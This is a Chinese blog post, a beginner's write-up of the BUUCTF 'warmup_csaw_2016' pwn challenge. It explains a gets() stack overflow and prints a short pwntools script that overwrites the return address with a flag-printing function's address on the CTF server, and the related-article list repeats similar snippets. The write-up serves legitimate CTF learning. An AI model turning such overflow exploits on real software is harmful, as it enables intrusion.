初学pwn-BUUCTF(warmup_csaw_2016)

最新推荐文章于 2024-04-23 14:52:52 发布
最新推荐文章于 2024-04-23 14:52:52 发布
阅读量352 收藏
点赞数 1
分类专栏: pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44547827/article/details/120021074
版权

初学pwn-writeUp

BUUCTF的第三道题,warmup_csaw_2016。
首先链接远端,
在这里插入图片描述
发现这里输出了一个十六进制的数字,就没有了后续。我们下载文件,持用ida打开查看。
在这里插入图片描述
可以看到主函数这里上边全部都是输出,只有最后return的时候,有一个get命令,给v5这个数组进行赋值。从这里可以发信啊,刚刚输出的一个地址,是sub40060D这个函数的地址。点进去看一下。
在这里插入图片描述
哦吼,cat flag.txt,那没毛病了,只需要在主函数的get这产生栈溢出,覆盖掉返回的值,就可以执行这个函数,获取flag了。
exp

from pwn import *

p = remote("node4.buuoj.cn", 26146)

payload = 'a'* 0x48 + p64(0x40060D).decode("iso-8859-1");

p.recvuntil(">");
p.sendline(payload);

p.interactive();

完成!

天柱是真天柱
关注
专栏目录
BUUCTF|warmup_csaw_2016 1
cm_zl
04-30 1254
from pwn import * context.log_level = 'debug' io=remote('node3.buuoj.cn', "28247") payload = "A"*(0x48) + p64(0x40060D) io.sendline(payload) io.interactive()
初学pwn-BUUCTF(ciscn_2019_n_1)
天柱的博客
08-31 632
初学pwn-writeUp BUUCTF的第四道题,ciscn-2019_n_1。 首先还是链接远端查看一下。 这里提示让猜一个数字,然后他告诉我们,这个数字应该是11.28125。这就有点掩耳盗铃了呀,但是输入了11.28125,还是在说应该输入11.28125。可能是有点问题,ida打开查看一下。 可以看到主函数里,调用了三个函数,前两个都是set某个值,我们直接看func函数。 那这就很明显了,刚刚输入的值赋给了v1,但是这里是要让v2的值等于11.28125才可以。查看一下地址。 嗯,跟想象
BUUCTF-warmup_csaw_2016 (新手pwner的成长日记3)
最新发布
weixin_58410275的博客
04-23 1009
解释一下这里填充数据为什么是4*16,我们在ida里面双击v5这个字符进入栈区一看,它是在s的基础上,从0到40的var_40占用的是4*16个字节的空间,+8是因为64位文件的rbp需要填充。的函数,进去一看,不得了不得了,我们的payload直接利用sub_40060D函数就行了,甚至不需要获取shell权限,地址在反编译之前可以在函数末尾看见的,就不做展示了。由于文件的漏洞函数直接打开了flag文件,所以我们直接得到了flag的交互。然后我们再翻一翻,找一找,有个。gets的内容,这里思路就到达。
[BUUCTF-PWN] warmup_csaw_2016
m0_46098032的博客
01-03 374
下载文件,checksec看一下,保护都没开,64位文件。 用IDA64打开文件,查看一下main函数。可以看到明显的栈溢出漏洞(gets)。 看一下v5,v5大小是 0x40, 返回地址是8 字节, 溢出大小就是0x48。 sub_40060D有点可疑,双击看一下。发现这里就是system函数,我们在构造pyaload的时候加上sub_40060D。 exp为: from pwn import * p = remote('node4.buuoj.cn', 2574...
BUUCTF PWN warmup_csaw_2016
Rt1Text的博客
04-22 409
1.checksec+运行 64位/没有保护 2.64位IDA进行 1.main 函数 明显的溢出函数gets() 跟进v5看看 offset = 0x40+8 shift+f12 真不错,cat flag.txt 找它的地址 3.上脚本 from pwn import* #p=process('./3warmup') p=remote("node4.buuoj.cn",28180) flag_addr=0x400611 payload=b'a'*(0...
[BUUCTF-pwn]——warmup_csaw_2016
Y_peak的博客
01-30 3982
BUUCTF——warmup_csaw_2016 题目地址:https://buuoj.cn/challenges 题目: 管他三七二十一,先将文件下载下来再说。老规矩,现在Linux上用checksec看看文件。64位,Stack、NX、PIE都没有开,应该是栈溢出的题。 赶快 go go go 去window 上用IDA反汇编看看,看到返回的是gets函数,一个典型的可以利用栈溢出覆盖的地方。其他没什么有用的信息。 按Shift + F12,看一下字符串。不看不知道一看有惊喜。cat flag.
BUUCTF - PWNwarmup_csaw_2016
古月浪子的博客
03-19 3263
checksec一下,发现啥保护也没开 IDA打开看看,又是明显的栈溢出漏洞,看到v5的长度为0x40、后门函数的地址为0x40060d from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' sl=lambda x:io.s...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 986
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
buuctfwarmup_csaw_2016
weixin_54452942的博客
03-25 394
发现了一个gets函数可以溢出,并且在上面的运行中,我们看到他输出了一个地址,在下面的sprintf函数中将一个函数的地址输出了,我们去看看这个函数是干什么的。一种是ida直接看(不一定准),40h是64字节,再加8字节的rbp就是ret的位置。这里的返回地址,也就是rbp下面的地址是df28,我们输入的‘aaaaa’在dee0。是一个没有保护机制的64位x86架构的小端可执行程序。断在main函数地址,或者调用gets函数的地址也行。减一下刚好和ida中的一样。两种方式获得填充数据大小。
buuctf warmup_csaw_2016
yidalipao1的博客
09-03 486
buuctf pwn
PWN学习记录(3)BUUCTF-warmup_csaw_2016
m0_58824086的博客
08-01 465
由**char v5[64]**可得,在main函数的栈帧中,划分了一个64字节的存储空间,也就是说只需要存入64个字节地址,就可以get函数返回地址。下载题目得到 warmup_csaw_2016,利用 file 命令查看该文件的类型,再通过checksec ./filename查看保护机制。将warmup_csaw_2016文件放入IDA中查看,打开字符串窗口。可得该文件是64位且该题任何保护都没有打开,所以我们可以实现最简单的栈溢出。将exp文件输入进1.py中,Esc+:wq保存并退出1.py。
CTF buuoj pwn-----第3题:warmup_csaw_2016
bing_Max的博客
08-29 1716
CTF buuoj pwn-----第3题:warmup_csaw_2016前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技
BUUCTF warmup_csaw_2016
m0_54262894的博客
08-20 349
BUUCTF warmup_csaw_2016 下载文件,把它拖入虚拟机中先checksec一下 这是一个64位的文件,并且没有开启任何的保护 我们先运行一下试试 发现它给出了一个地址,我们先记下,可能会用到 放入64位IDA中查看一下他的代码 伪C代码↓ 汇编代码↓ 发现了一个函数sprintf,并且用%p的方式来输出,也就是输出地址 下面是我搜索到的信息 我们双击40060D看一下 再回过头来看代码 众所周知gets函.
buuctf--pwn-warmup
weixin_45427676的博客
09-19 522
下载文件后首先查看保护机制,checksec发现没有开什么保护,64位程序,在IDA中打开查看程序流程 gets()函数很明显会有栈溢出漏洞,然后发现有后门函数,也就是sub_40060D函数,而且会发现你执行此程序的时候可以直接输出后门函数的地址,就不需要再找他的地址了 sprintf(&s, "%p\n", sub_40060D) 这个函数的意思就是将sub_40060D的地址放在s缓冲区中输出地址,所以执行的时候就可以直接看到后门函数地址。 所以现在的漏洞利用思路就是将v5缓冲区覆盖
BUUCTF-warmup_csaw_2016
m0_64180167的博客
04-11 450
64位的linux文件。
buuctf|warmup_csaw_2016 1
m0_64236521的博客
04-15 1355
buuctf|warmup_csaw_2016 1 下载文件运行如下 checksec查看下保护 file一下,是64位文件 拉进ida,发现gets(v5),查看v5,明显的栈溢出 找到system,地址40060d 直接exp from pwn import* p=remote('node4.buuoj.cn',28415) payload=b'A'*0x48+p64(0x40060D) p.sendline(payload) p.interactive() 得flag ...
BUUCTF pwn——warmup_csaw_2016
CNS-Enterprise BCC-1701-J
03-11 141
BUUCTF 做题练习
[每日一PWN]BUUCTF warmup_csaw_2016
qq_55233040的博客
11-20 484
和第一题RIP一样,是经典而基础的ret2text。
攻防世界pwn-forgot
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值